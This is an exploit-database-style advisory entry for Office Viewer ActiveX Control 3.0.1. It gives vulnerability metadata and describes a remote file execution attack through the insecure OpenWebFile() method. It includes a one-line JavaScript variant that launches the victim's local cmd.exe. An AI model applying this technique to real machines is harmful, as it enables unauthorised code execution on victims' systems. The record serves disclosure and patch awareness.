Vendor: Office Viewer ActiveX Control
By: Houssamix
CVSS: 9.3 (HIGH)
Remote File execution exploit
CWE: 94
Product Name: Office Viewer ActiveX Control
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:anydraw:office_viewer_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2009
Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit
This exploit uses the insecure method 'OpenWebFile()' to execute a remote file on the victim's PC. It can also execute a local file on the victim's PC by changing the function do_it to 'function Do_it() { File = "c:\\windows\\system32\\cmd.exe"; hsmx.OpenWebFile(File); }'
Mitigation:
Ensure that the Office Viewer ActiveX Control is up to date and that all security patches are applied.